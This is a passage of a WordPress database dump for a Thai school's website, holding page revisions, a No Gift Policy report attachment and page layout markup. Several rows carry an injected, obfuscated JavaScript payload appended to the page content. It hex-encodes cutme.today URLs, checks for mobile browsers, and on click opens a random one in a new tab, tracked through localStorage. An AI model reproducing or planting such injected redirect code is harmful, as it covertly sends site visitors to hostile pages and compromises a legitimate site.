_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-15 09:30:49','2024-08-15 02:30:49','',14,'http://pakhaeng.ssk.in.th/?p=832',0,'revision','',0),
(833,1,'2024-08-15 09:31:39','2024-08-15 02:31:39','','O28 แบบสรุปรายงานตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่','','inherit','','closed','','o28-%e0%b9%81%e0%b8%9a%e0%b8%9a%e0%b8%aa%e0%b8%a3%e0%b8%b8%e0%b8%9b%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%95%e0%b8%b2%e0%b8%a1%e0%b8%99%e0%b9%82%e0%b8%a2%e0%b8%9a%e0%b8%b2','','','2024-08-15 09:31:39','2024-08-15 02:31:39','',831,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O28-แบบสรุปรายงานตามนโยบาย-No-Gift-Policy-จากการปฏิบัติหน้าที่.pdf',0,'attachment','application/pdf',0),
(834,1,'2024-08-15 09:32:13','2024-08-15 02:32:13','<!-- wp:file {\"id\":833,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O28-แบบสรุปรายงานตามนโยบาย-No-Gift-Policy-จากการปฏิบัติหน้าที่.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O28-แบบสรุปรายงานตามนโยบาย-No-Gift-Policy-จากการปฏิบัติหน้าที่.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"รายงานตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่\"></object><a id=\"wp-block-file--media-04448cdb-33f0-4d66-8974-b0cdd58c918a\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O28-แบบสรุปรายงานตามนโยบาย-No-Gift-Policy-จากการปฏิบัติหน้าที่.pdf\">รายงานตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O28-แบบสรุปรายงานตามนโยบาย-No-Gift-Policy-จากการปฏิบัติหน้าที่.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-04448cdb-33f0-4d66-8974-b0cdd58c918a\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายงานผลตามนโยบาย No Gift Policy','','inherit','closed','closed','','831-revision-v1','','','2024-08-15 09:32:13','2024-08-15 02:32:13','',831,'http://pakhaeng.ssk.in.th/?p=834',0,'revision','',0),
(835,1,'2024-08-15 09:32:38','2024-08-15 02:32:38','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 